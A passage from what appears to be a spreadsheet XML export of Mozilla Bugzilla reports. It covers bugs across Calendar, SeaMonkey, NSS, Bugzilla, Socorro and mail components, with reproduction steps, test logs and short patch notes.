empty and can be seen with IE
The English site of TheMarker does not suppport responses to articles therefore
the bug can be seen only in the Hebrew site.</t>
  </si>
  <si>
    <t>nivtwig</t>
  </si>
  <si>
    <t>TOOLKIT-451058</t>
  </si>
  <si>
    <t>Address post-review comments</t>
  </si>
  <si>
    <t>See bug 435995 comment 17</t>
  </si>
  <si>
    <t>BUGZILLA-313661</t>
  </si>
  <si>
    <t>New bug bugmail omits initial CC list</t>
  </si>
  <si>
    <t>When bug 313656 was filed by bz samuel@sieb.net was included in the initial CC list. The bugmail sent to ssieb and myself (I watch his account) did not include the CC field at all but stated CC as the reason for sending.
I have bugmail from 2 days ago (bug 313414) that does include the initial CC list and I see no reason to omit it.</t>
  </si>
  <si>
    <t>SOCORRO-865791</t>
  </si>
  <si>
    <t>Allow for arbitrary classification of crashes at processing and on-demand</t>
  </si>
  <si>
    <t>Here's what I think I'd like to do about hang processing it will also help solve a few other problems I've been dealing with. I would like a way to do arbitrary classification of crash reports.
The classifier will be a python function (or class?). The classifier will receive the data from hbase (specifically the processed JSON). The classified will produce:
  classification: string
  associateddata: valuestring [optional]
Because we may revise classifications regularly when we store a classification we should also store the version number of the classifier which produced it.
The classifications should be stored in both hbase and postgres. I'm going to throw out these strawmen and let the experts refine as necessary:
* Add an hbase family classifications: each classification will be stored separately as a little JSON e.g.
classifications:flash-hang-classification '{version: 3 classification: bugNNNNNN associateddata: highcpu}'
* In postgres have a partitioned join table with the data:
CREATE TABLE classifications (
  uuid text NOT NULL
  classification text NOT NULL
  version integer NOT NULL
  associateddata text NULL
)
As for applying classifications I propose the following setup:
* At processing time each classifier decides whether it wants to process a particular report. For example the Flash hang classifier would run only for Firefox plugin hang reports which have all four Flash minidumps in the report.
* The API will expose a way to request classification of other queries of crashes as requested by authenticated users.
* The middleware and the new web-facing API layer will expose classifications.
* Classifiers will be deployed as part of the regular Socorro release cycle. I'm not sure whether we should just check them into the Socorro codebase or whether they should live in some separate config repository (they are going to be very specific to Mozilla's use-cases).</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-437975</t>
  </si>
  <si>
    <t>Can't send emails to non-mork mailing lists</t>
  </si>
  <si>
    <t>Created attachment 324269
The fix
I'm not 100% sure if this is a regression but I expect it is. In bug 437903 it was reported that we can't send to mailing lists for OS X directories.
The problem I'll address here is that the nsMsgCompose::CheckAndPopulateRecipients function does not support finding mailing lists from other address book types when it could easily do so.
Currently the function is trying to get the nsIMDBDirectory and its nsIAddrDatabase early on so it can use them to increase the popularity of the recipient in the database. As you'd expect this fails for non-mork address books and so the function doesn't get to the stage of finding the lists for those.
This is a bit hard to test on its own but the unit tests for the existing mork address books pass (they do exercise this function) Mac mailing lists will still fail due to bug 437903 outlook ones should work.
Note whilst debugging this I also found that we weren't clearing the mailListArray between each loop this didn't cause a major problem but did mean we were iterating through the sum of all the mailing lists so far rather than just the ones for the current directory.</t>
  </si>
  <si>
    <t>BUGZILLA-65290</t>
  </si>
  <si>
    <t>Edit system group regexp.</t>
  </si>
  <si>
    <t>editgroups.cgi doesn't let you edit the userregexp of system groups like
canconfirm you have to fiddle with mysql.</t>
  </si>
  <si>
    <t>CALENDAR-260458</t>
  </si>
  <si>
    <t>Collect file commands in file menu and separate new/open calendar to avoid warning already exists. do you want to replace it</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: cvs-cal
Expect commands for calendar files to be in the File menu but some are hidden
in the Tools menu.  Suggest collecting them into the file menu.
The 'new calendar' command does double duty as 'open calendar' command but this
can be confusing (at least on windows platform) because it uses the file picker
in 'save' mode which warns about overwriting an existing file even when trying
to open that file.  Therefore suggest separating New and Open functions so that
the Open function can use the file picker in open mode rather than save
mode.  Previous discussion:
http://bugzilla.mozilla.org/show_bug.cgi?id=170190#c4
http://bugzilla.mozilla.org/show_bug.cgi?id=243799#c3
Reproducible: Always
Steps to Reproduce:
Open an existing file (perhaps downloaded) as follows:
1. File | New Calendar
2. Browse for file
3. pick an existing .ics file click 'save'
Actual Results:  
1. File menu has New file but no Open file or subscribe remote file or import
file or export file or publish file.
2. File picker title &amp; button say 'save' but calendar is not loaded yet to save.
3. File picker gives Warning:   already exists.  Do you want to
replace it?
Expected Results:  
1. File menu has New file Open file subscribe remote file import file export
file publish file ...
2. File picker title and button say 'open'.
3. File picker gives no warning about an existing file.</t>
  </si>
  <si>
    <t>SEAMONKEY-387050</t>
  </si>
  <si>
    <t>Build ID empty =&gt; SeaMonkey {Build ID: }</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7pre) Gecko/2007070403 MultiZilla/1.9.0.0k SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7pre) Gecko/2007070403 MultiZilla/1.9.0.0k SeaMonkey/2.0a1pre
Starting with the move to Debug and QA UI AddIn the SeaMonkey nightlys don't display the Build ID: in the Windowname.
Reproducible: Always
Steps to Reproduce:
1. start SeaMonkey
2. read Window name
3.
Actual Results:  
Enter A Bug - SeaMonkey {Build ID: } is displayed
Expected Results:  
Enter A Bug - SeaMonkey {Build ID: 200707040303 } is displayed</t>
  </si>
  <si>
    <t>Florian.Steinel</t>
  </si>
  <si>
    <t>TOOLKIT-164608</t>
  </si>
  <si>
    <t>Menu bars in background windows should be grayed out (disabled appearance)</t>
  </si>
  <si>
    <t>Build: Mozilla 1.1b (I know it's not a nightly but if the bug's been fixed
since then I'll eat my hat) Windows 98
To reproduce:
1.  Place any window in front of a Mozilla browser window.
2.  Move/resize the window in front so that the menu bar in the browser window is
    visible.
What you should see:
*   The menu bar is grayed out as it would be if it were disabled.
What you actually see:
*   The menu bar appears just as it would if the window was frontmost.
Microsoft changed the behavior of native Windows menu bars from Windows 98
onwards once they discovered that when more than one menu bar was visible
people often went for the wrong one. (Which is one of the reasons why Mac OS has
only one menu bar.)
This is the Windows equivalent of the Mac's bug 54488 -- they probably depend on
the same as-yet-unfiled bug about window controllers or whatever.</t>
  </si>
  <si>
    <t>NSS-489188</t>
  </si>
  <si>
    <t>object/memory leak in libpkix</t>
  </si>
  <si>
    <t>Created attachment 373678
Patch v1 - resolt object leak problem
Yet another memory leak in libpkix. This time selfserv leaked list of chain checkers that were created in pkix_Build_CheckInCache. The actual reason of the error is not known but the print out of the leaked object bring some light to the leak problem.
ssl.sh: Stress TLS  ECDH-ECDSA  AES 128 CBC with SHA (no reuse) ----
selfserv starting at Mon Apr 20 00:16:47 PDT 2009
selfserv -D -p 8111 -d ../server -n GORIDE.red.iplanet.com -B -s \
         -e GORIDE.red.iplanet.com-ec -w nss -c :C004 -i ../tests_pid.3120  &amp;
trying to connect to selfserv at Mon Apr 20 00:16:47 PDT 2009
tstclnt -p 8111 -h GORIDE.red.iplanet.com -B -s -q \
        -d ../client -v &lt; /export/tinderlight/data/goride_32_DBG/mozilla/security/nss/tests/ssl/sslreq.dat
tstclnt.exe: connecting to GORIDE.red.iplanet.com:8111 (address=192.18.72.38)
kill -0 1456 &gt;/dev/null 2&gt;/dev/null
selfserv with PID 1456 found at Mon Apr 20 00:16:47 PDT 2009
selfserv with PID 1456 started at Mon Apr 20 00:16:47 PDT 2009
strsclnt -q -p 8111 -d ../client -B -s -w nss -2 -c 100 -C :C004 -N \
          GORIDE.red.iplanet.com
strsclnt started at Mon Apr 20 00:16:47 PDT 2009
....
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
(pkix_CacheCert_Add: PKIX_PL_HashTable_Add for Certs skipped: entry existed
strsclnt: -- SSL: Server Certificate Validated.
0[b52898]: Class Cert leaked 2 objects of size 144 bytes total = 288 bytes
0[b52898]: Class CertChainChecker leaked 4 objects of size 20 bytes total = 80 bytes
0[b52898]: Class PolicyCheckerState leaked 1 objects of size 88 bytes total = 88 bytes
0[b52898]: Class PolicyNode leaked 1 objects of size 28 bytes total = 28 bytes
0[b52898]: Class CertSelector leaked 1 objects of size 12 bytes total = 12 bytes
0[b52898]: Class ComCertSelParams leaked 1 objects of size 80 bytes total = 80 bytes
0[b52898]: Class Date leaked 1 objects of size 8 bytes total = 8 bytes
0[b52898]: Class Error leaked 1 objects of size 20 bytes total = 20 bytes
0[b52898]: Class List leaked 23 objects of size 20 bytes total = 460 bytes
0[b52898]: Class OID leaked 14 objects of size 12 bytes total = 168 bytes
0[b52898]: Class PublicKey leaked 3 objects of size 4 bytes total = 12 bytes
0[b52898]: Class SignatureCheckerState leaked 1 objects of size 20 bytes total = 20 bytes
0[b52898]: Class TargetCertCheckerState leaked 1 objects of size 32 bytes total = 32 bytes
0[b52898]: Class X500Name leaked 4 objects of size 24 bytes total = 96 bytes
0[b52898]: Assertion failure: numLeakedObjects == 0 at C:/mozilla-build/msys/export/tinderlight/data/goride_32_DBG/mozilla/security/nss/lib/libpkix/pkix_pl_nss/system/pkix_pl_lifecycle.c:294
strsclnt completed at Mon Apr 20 00:16:59 PDT 2009
ssl.sh: #4271: Stress TLS  ECDH-ECDSA  AES 128 CBC with SHA (no reuse) produced a returncode of 3 expected is 0.  - FAILED
trying to kill selfserv with PID 1456 at Mon Apr 20 00:16:59 PDT 2009
kill 1456
./all.sh: line 17:  1456 Terminated              ${PROFTOOL} ${BINDIR}/selfserv -D -p ${PORT} -d ${P_R_SERVERDIR} -n ${HOSTADDR} ${SERVER_OPTIONS} ${ECC_OPTIONS} -w nss ${sparam} -i ${R_SERVERPID} $verbose
selfserv with PID 1456 killed at Mon Apr 20 00:16:59 PDT 2009
Potential leak is at this line 3101 through 3104 of pkix_build.c rev 1.56.
The cleanup of the list of checkers happens only upon successful execution of  pkix_Build_ValidateEntireChain. They are leaked in case of it's failure.
Patch fixes memory leak by destroying object right before they get assigned to a new value.</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-477003</t>
  </si>
  <si>
    <t>The font size and style for the info area are different between dashboard and editor</t>
  </si>
  <si>
    <t>The dashboard is smaller than the editor.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-506769</t>
  </si>
  <si>
    <t>Remove or deemphasize Name and Email fields on Feedback form</t>
  </si>
  <si>
    <t>On Hendrix can we either remove the Name and Email fields or deemphasize those fields (by moving them down closer to the warning and/or labeling Name as optional and moving optional right next to Name and Email instead of at the end of the line)?
Even after we moved the notice about information being made public above the Submit button we're still getting emails from people asking to have their feedback responses removed from the public newsgroup archives.
As someone said in a recent email even with the notice it is reasonable to assume that the name and email information is being kept for contact purposes only and isn't part of what is getting published publicly:
It says don't provide personal information but on the other hand offers a name field.  That implies that a persons name would not be one of those publicly available fields when in fact it is.  I assumed the name field was for contact information purposes only.  That's a reasonable assumption.</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-964520</t>
  </si>
  <si>
    <t>Remove all article administrative links from web search indexes</t>
  </si>
  <si>
    <t>The only thing that should be searchable from sumo (regular search) or an external search engine is the url of the user-facing part of the article.
We should not index the history page diffs the discussion forum show translations section and the what links here section.
For example a search for this archived article https://support.mozilla.org/en-US/kb/Configuring%20Firefox%20for%20FIPS%20140-2 (http://mzl.la/19XSP3o) turns up links to the show translations section and a diff. We want that kind of stuff to not show up.</t>
  </si>
  <si>
    <t>rrosario</t>
  </si>
  <si>
    <t>mverdi</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-428998</t>
  </si>
  <si>
    <t>Can't connect translation with en-US article</t>
  </si>
  <si>
    <t>http://support.mozilla.com/fi/kb/Tuo+tiedot+Safarista is a translation of http://support.mozilla.com/en-US/kb/Importing+from+Safari but it was created from scratch. However it's not possible to manually connect the two for some reason.</t>
  </si>
  <si>
    <t>SEAMONKEY-515228</t>
  </si>
  <si>
    <t>Help button in Search Addresses dialog lacks Help icon</t>
  </si>
  <si>
    <t>The (custom) Help button in the Search Messages dialog lacks the Help icon used by standard dialog Help buttons. Furthermore the Help button definition should come from helpMessengerOverlay.xul as well so that ABSearchDialog.xul does not need to know about the OpenHelp function.</t>
  </si>
  <si>
    <t>CORE-95154</t>
  </si>
  <si>
    <t>HTMLObjectElement.form returns null</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.3+)
Gecko/20010813 Netscape6/6.1b1
BuildID:    2001-08-09-13-trunk
when i use HTMLObjectElement.form always null is returned which su a default
value. Testcase included ....
Reproducible: Always
Steps to Reproduce:
var obj = document.getElementsByTagName(OBJECT).item(0).form
document.write(obj)
Actual Results:  null
Expected Results:  [object HTMLFormElement]</t>
  </si>
  <si>
    <t>stummala</t>
  </si>
  <si>
    <t>SEAMONKEY-93051</t>
  </si>
  <si>
    <t>Appearance preferences panel seems unfinished</t>
  </si>
  <si>
    <t>The Appearance dialog seems unfinished:
- Show Toolstips just stand in the middle og nowhere. I have no clue what 
kind of tooltips we're talking about
- Choose a language text should have a line/box around it.
build 20010731</t>
  </si>
  <si>
    <t>marlon.bishop</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-257571</t>
  </si>
  <si>
    <t>head attributes leaking into recycled compose window</t>
  </si>
  <si>
    <t>If I reply to a message that has some style stuff inside of the head tag (such
as an RSS message):
    Bart Decrem: Make planet rock even more
      body {
        margin: 0
        border: none
        padding: 0
      }
      #content {
        margin: 0
        border: none
        padding: 0.4em
        padding-top: 1.8em
      }
From that point forward the head attributes are always present in the recyled
compose window. We never clear them out. 
We should be removing the head element from the document when we move the
compose window into the recylced state in the same way that we remove any body
style attributes.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-486699</t>
  </si>
  <si>
    <t>Support running the JIT late after Verifier already has run</t>
  </si>
  <si>
    <t>this is a step on the way to better managing of code memory.</t>
  </si>
  <si>
    <t>BUGZILLA-344965</t>
  </si>
  <si>
    <t>Workflow Centralization: process_bug.cgi and bug/* templates</t>
  </si>
  <si>
    <t>bug/knob.html.tmpl and list/edit-multiple.html.tmpl both deal with telling the user which status are available.  They get their information from show_bug.cgi and process_bug.cgi will have to deal with whatever the user wants to do.
When editing a single bug there will always be the option to keep the current status.  To determine which other statuses are avavilable execute Workflow-&gt;bug_transitions().
When editing multiple bugs execute Workflow-&gt;bug_transitions() once per distinct bug status.  Take each set of transitions returned strip off/ignore the current_status portion of the transition and take the intersection of the sets.  The resulting set of transitions can be safely applied to any of the bugs in the list.  There will still be the option to keep the current status.</t>
  </si>
  <si>
    <t>CORE-499816</t>
  </si>
  <si>
    <t>Minimizing Firefox does not release window focus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1pre) Gecko/20090622 Shiretoko/3.5pre (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1pre) Gecko/20090622 Shiretoko/3.5pre (.NET CLR 3.5.30729)
Minimizing Firefox seems to cause weird behavior with Steam.  It can cause previously closed Steam windows to reopen and sometimes even access parts of the menu of currently open Steam windows.  
Reproducible: Always
Steps to Reproduce:
1.  Click the X to close any Steam windows leaving behind only the system tray icon for it.
2.  Now minimize Firefox
Actual Results:  
One of the previously closed Steam windows will automatically reopen and gain focus
Expected Results:  
Steam windows should have stayed minimized.
I'm using Vista x64 here.
The first nightly build with this bug was the 2009-05-21-04 nightly (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2009/05/2009-05-21-04-mozilla-1.9.1/)
Interestingly enough one of the changes in that build was a fix for a similar problem with Live messenger.    
https://bugzilla.mozilla.org/show_bug.cgi?id=472874
There are several others confirming this bug in the Mozillazine Firefox Builds forum as well as on the Steam forums.
http://forums.mozillazine.org/viewforum.php?f=23
http://forums.steampowered.com/forums/showthread.php?t=895712
I posted about it in the Steam forums with several others confirming the bug and got a response from a Valve employee who believes it is a problem with Firefox.
http://forums.steampowered.com/forums/showpost.php?p=10417467&amp;postcount=71
Sounds like FF posting windows messages like WM_SETFOCUS or such incorrectly and having them hit whatever window has taken over after it's minimized. Can't really see how it would be our bug from your descriptions but I'll see if I can repro when I get a chance.</t>
  </si>
  <si>
    <t>crookedrain</t>
  </si>
  <si>
    <t>CORE-94341</t>
  </si>
  <si>
    <t>Hang changing the display of a  through the DOM</t>
  </si>
  <si>
    <t>Possibly style system but since that's no longer owned... :-)  This still
occurs in today's build.
Primary Browser: 	ntsc61  
Operating System: 	Win2K  
Language: 		English  
Issue Summary: 		changing the display of a  crashes netscape 6.1
Component: 		Navigator
Doing What: 		Browsing web pages  
Severity: 		CrashsNetscape6  
Can Reproduce: 		Always
Try this URL: 		http://www.wam.umd.edu/~dlg/ns61bug.htm
Issue Detail: 
On the web page change clinical user to either
one of the CODA options and NS will hang.   The
problem is that it tries to change
document.getElementByID(textrow).style.display
to block and that's where it hangs. textrow is a
 .</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-468745</t>
  </si>
  <si>
    <t>run autoconf in js/src before generating source tarball</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.4) Gecko/2008111315 Firefox/3.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.4) Gecko/2008111315 Firefox/3.0.4
When I try to compile firefox 3.1b2 from the source tarball I get this right in the configure step at the beginning:
creating pr/src/pthreads/Makefile
configure: warning: Recreating autoconf.mk with updated nspr-config output
configuring in js/src
running /bin/sh ./build/autoconf/configure  --enable-crypto --disable-tests --disable-debug --disable-mailnews --disable-composer '--enable-optimize=-Os -pipe -march=pentium-m' --enable-xft --enable-strip --enable-xinerama --enable-default-toolkit=gtk2 --prefix=/opt/phoenix --x-includes=/usr/X11R7/include --x-libraries=/usr/X11R7/lib64 --prefix=/opt/firefox64 --with-system-zlib --enable-application=browser --enable-pango --enable-svg --enable-svg-renderer=cairo --enable-reorder --enable-strip --enable-system-cairo --disable-debug '--enable-optimize=-Os\ -fPIC\ -pipe' --enable-official-branding --enable-default-toolkit=cairo-gtk2 --enable-threadsafe --with-nspr-cflags='-I/tmp/mozilla-central/dist/include/nspr' --with-nspr-libs='-L/tmp/mozilla-central/dist/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl' --includedir=/tmp/mozilla-central/dist/include --bindir=/tmp/mozilla-central/dist/bin --libdir=/tmp/mozilla-central/dist/lib --with-sync-build-files=. --enable-jemalloc --cache-file=../.././config.cache --srcdir=.
/bin/sh: ./build/autoconf/configure: No such file or directory
configure: error: ./build/autoconf/configure failed for js/src
make: *** [compile] Error 1
Reproducible: Always
Steps to Reproduce:
1. ./configure --enable-application=browser --enable-default-toolkit=cairo-gtk2
(that's it)
Actual Results:  
configuring in js/src
running /bin/sh ./build/autoconf/configure  --enable-crypto --disable-tests --disable-debug --disable-mailnews --disable-composer '--enable-optimize=-Os -pipe -march=core2' --enable-xft --enable-strip --enable-xinerama --enable-default-toolkit=gtk2 --prefix=/opt/firefox64 --enable-application=browser --enable-default-toolkit=cairo-gtk2 --enable-threadsafe --with-nspr-cflags='-I/tmp/mozilla-central/dist/include/nspr' --with-nspr-libs='-L/tmp/mozilla-central/dist/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl' --includedir=/tmp/mozilla-central/dist/include --bindir=/tmp/mozilla-central/dist/bin --libdir=/tmp/mozilla-central/dist/lib --with-sync-build-files=. --enable-jemalloc --cache-file=../.././config.cache --srcdir=.
/bin/sh: ./build/autoconf/configure: No such file or directory
configure: error: ./build/autoconf/configure failed for js/src</t>
  </si>
  <si>
    <t>felix-mozilla</t>
  </si>
  <si>
    <t>BUGZILLA-449663</t>
  </si>
  <si>
    <t>Code error thrown when resolving bug as duplicate of a bug the reporter cannot see</t>
  </si>
  <si>
    <t>Created attachment 332798
Patch to fix usage_mode error in Bugzilla/Bug.pm (v1)
Line 1157 in Bugzilla/Bug.pm has:
    elsif (Bugzilla-&gt;params-&gt;usage_mode == USAGE_MODE_BROWSER) {
and should be:
    elsif (Bugzilla-&gt;usage_mode == USAGE_MODE_BROWSER) {
Patch attached.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-304849</t>
  </si>
  <si>
    <t>need cvs rename of extensons/auth/nsAuthModuleGSSAPI.cpp and nsAuthModuleGSSAPI.h</t>
  </si>
  <si>
    <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=280792#c78 for context. We need
mozilla/extensions/auth/nsAuthModuleGSSAPI.cpp to be renamed to nsAuthGSSAPI.cpp
and nsAuthModuleGSSAPI.h to be renamed to nsAuthGSSAPI.h. This directory is not
currently built by anyone so it's safe to make this change - it won't break the
build. We want the rename to keep cvs history. This bug blocks my ability to
drive bug 280792 and a couple others in so I'd really appreciate it if this
could happen in the next day or so. This needs to happen on the trunk first and
it may need to happen on the branch as well (not sure how the rename will play
with the branch - does it all just come for free?)</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-867832</t>
  </si>
  <si>
    <t>Please update Marketplace Validator to accept new simplePush manifest API</t>
  </si>
  <si>
    <t>1. create a manifest with simplePush properties from here:
https://wiki.mozilla.org/WebAPI/SimplePush
2. go here and enter your manifest file:
https://marketplace.firefox.com/developers/validator
result:
`push` is not a recognized element within a Web App Manifest
Error: While iterating a Web App Manifest a `push` was found within a permissions which is not valid.
You can find more information at https://developer.mozilla.org/docs/Apps/Manifest
Node: root &gt; permissions
`messages` is not a recognized element within a Web App Manifest
Warning: While iterating a Web App Manifest a `messages` was found within a root which is not valid.
You can find more information at https://developer.mozilla.org/docs/Apps/Manifest
Node: root
expected: these need to be added as valid</t>
  </si>
  <si>
    <t>hearcomestreble+bz</t>
  </si>
  <si>
    <t>edwong</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-8242</t>
  </si>
  <si>
    <t>[LAUNDRY] Remove old session History code from nsWebShell</t>
  </si>
  <si>
    <t>Set QA Contact to radha.  You'll need to mark this bug Verified once you have
removed the code. Thanks!</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-316870</t>
  </si>
  <si>
    <t>Can't drag a multi-line hyperlink at the second line</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051107 Camino/1.0b1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051107 Camino/1.0b1
On 1.0b when I drag an URL which spans across multiple lines on a web page to another tab it doesn't work if I drag it from the second line of the URL onwards and would only work if I drag it at the first line of the same URL.
Reproducible: Always
Steps to Reproduce:
1. Go to a web page with hyperlinks which span across multiple lines (eg http://www.football365.com/  under the Latest News column at the bottom-right).
2. Drag a multi-line hyperlink by mouse-down at the second line of the hyperlink and then attempt to move it to another tab on the tab bar.
3. Mouse-up at another tab on the tab bar.
Actual Results:  
Text of the webpage highlighted following the mouse movement ending at the location of mouse-down.
Expected Results:  
The hyperlink dropped at the tab where mouse-up is performed and that tab loads the URL of the dragged hyperlink.
Dragging the same URL at the first line works as expected.  This issue doesn't appear on 0.8.4.</t>
  </si>
  <si>
    <t>pkchan+bug=mozilla</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-165600</t>
  </si>
  <si>
    <t>Change the default throbber</t>
  </si>
  <si>
    <t>The default throbber just really doesn't cut it. It's a pixel width line that
rotates. How can you see that? I understand you can make your own throbber
(which is what I do) but why not just include a better throbber?
Here is my edited version.
Replace  throbber-01.gif throbber-02.gif throbber-03.gif throbber-04.gif and
throbber-05.gif in Navigator.app/Contents/Resources/ with the throbber-0x.gif
files from throbber.tar.gz
*Note: Back up the orginal throbber frames if you want to revert</t>
  </si>
  <si>
    <t>dereks</t>
  </si>
  <si>
    <t>CORE-406290</t>
  </si>
  <si>
    <t>Potential read of uninitialized data in cert viewer</t>
  </si>
  <si>
    <t>File mozilla/security/manager/ssl/src/nsNSSCertHelper.cpp
ProcessGeneralName calls into PR_NetAddrToString (twice).
The return value from PR_NetAddrToString it not being checked.
Even if PR_NetAddrToString fails the code will the contents of buf to a string.
buf is uninitialized and might not contain zero.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-453196</t>
  </si>
  <si>
    <t>When replying to HTML message with embedded attachment (e.g. inline images) if the original message is deleted or moved before sending the reply TB hangs with Attaching...</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-GB rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b1pre) Gecko/20080830025944 Shredder/3.0b1pre
When replying to a message with an embedded attachment if the original is deleted before sending the reply it hangs with Attaching... 
Reproducible: Always
Steps to Reproduce:
1.Go to inbox
2.Open a message with an embedded image
3.Reply to it
4.Go back to the inbox
5.Delete the message being replied to
6.Go to compose window and send it
Actual Results:  
It sits there with an Attaching dialog - it looks like it is trying to find the attachment which has been deleted. 
Expected Results:  
Not totally sure - an error would be acceptable but not what the user expects especially since they often don't realise they are working with an attachment (I hit this with an embedded graphic in a signature and it took me a while to realise why there was an error)
This may seem obscure but I think its not uncommon message to start a reply to a message then for some reason not completing it while continuing to work on the inbox - including deleting the message being replied to.</t>
  </si>
  <si>
    <t>mitra_lists</t>
  </si>
  <si>
    <t>CORE-530255</t>
  </si>
  <si>
    <t>On trace replace GetFromClosure/GetClosureVar/GetClosureArg with specialized code</t>
  </si>
  <si>
    <t>I ran into GetFromClosure being about 30% of some of the dromaeo JS tests today. Specifically the js_GetPropertyHelper call.  Brendan muttered something about the property cache is there a way we can make use of it here?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-469215</t>
  </si>
  <si>
    <t>setup postgres replication for breakpad in staging.</t>
  </si>
  <si>
    <t>Please setup postgres replication for breakpad in the staging environment.  The staging db lives on tm-stage01-master01.  The purpose of this replicated environment is to be able to make backups of the db from the slave without impacting the production db performance.  Once the staging env is setup and work we can then deploy this to production.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-324140</t>
  </si>
  <si>
    <t>cvs remove modules/libnls - not used and non-free licence</t>
  </si>
  <si>
    <t>We should remove modules/libnls from CVS. It's just headers the code is non-free and no-one is using it.
Gerv</t>
  </si>
  <si>
    <t>CALENDAR-193467</t>
  </si>
  <si>
    <t>adding a calendar can replace an existing one (calendarManager).</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20021212
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20021212
When a new calendar is added the number it is assigned it calculated from the
length of the array this causes problems when earlier items have been removed.
Reproducible: Always
Steps to Reproduce:
1. Add a new local calendar called 1st Calendar
2. Add another calendar called 2nd Calendar
3. Delete 1st Calendar
4. Add another calender called 3rd Calendar
Actual Results:  
The 2nd calendar is replaced with the 3rd calendar.
Expected Results:  
The 2nd calendar should have remained and the 3rd calendar should have been added.
Mozilla calendar list should be empty before attempting to reproduce this bug.
Closing mozilla and removing all the local ics files and the CalendarManager RDF
file is good enough (you will lose all calendar data).</t>
  </si>
  <si>
    <t>MOZILLA.ORG-413283</t>
  </si>
  <si>
    <t>l10n CVS account request for Romi Hardiyanto (id)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 id rv:1.9b3pre) Gecko/2008011622 Minefield/3.0b3pre
Build Identifier: 
Following up bug 320664 bug 412364
I'd like to get CVS commit access for Indonesian translation of Firefox. The
SSH public key will follow.
I have contact Dody Suria Wijaya already (bug 330901) and he had given me go head signal.
Reproducible: Always</t>
  </si>
  <si>
    <t>romihardiyanto</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-306378</t>
  </si>
  <si>
    <t>[Firefox de] introduce localized browser/chrome/overrides/netError.dtd to stop tinderbox from burning</t>
  </si>
  <si>
    <t>We got a fresh error on the German tinderbox:
error: file '../../../l10n/de/browser/chrome/overrides/netError.dtd' doesn't exist 
looks like we are missing a whole new file. :(</t>
  </si>
  <si>
    <t>mmx_bugzilla</t>
  </si>
  <si>
    <t>BUGZILLA-69054</t>
  </si>
  <si>
    <t>DB_File is not portable</t>
  </si>
  <si>
    <t>I have just installed Bugzilla (actually the second time but I did a complete
upgrade since the first time was just for fun.  The collectstats.pl fails
because DB_File was not installed.  To install DB_File one also needs BerkeleyDB
(which one should have assuming that one has a new version of mySql).  
Anyway those two packets should be added to the optional SW needed notes.</t>
  </si>
  <si>
    <t>CALENDAR-463273</t>
  </si>
  <si>
    <t>Error: Failed to read 'repeatDetailsOrdinal0' from chrome://calendar/locale/calendar-event-dialog.properties</t>
  </si>
  <si>
    <t>Created attachment 346515
Testcase from Bug 356207
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081105 Calendar/1.0pre (BuildID: 20081105110610)
Steps to Reproduce:
1. Start Sunbird with clean profile
2. Import the attached testcase that was taken from Bug 356207
3. Open the event for editing choose Edit all occurrences when prompted
Actual Results:
Recurrence summary in the Edit Event dialog shows
[[[
Occurs the Failed to read 'repeatDetailsOrdinal0' from chrome://calendar/locale/calendar-event-dialog.properties. Wednesday effective 9/1/2004 from 2:15 PM to 2:15 PM
]]]
Error Console shows:
[[[
Error: Failed to read 'repeatDetailsOrdinal0' from chrome://calendar/locale/calendar-event-dialog.properties. Error: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIStringBundle.GetStringFromName]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: chrome://calendar/content/calUtils.js :: calGetString :: line 658  data: no]
Source file: chrome://calendar/content/calUtils.js
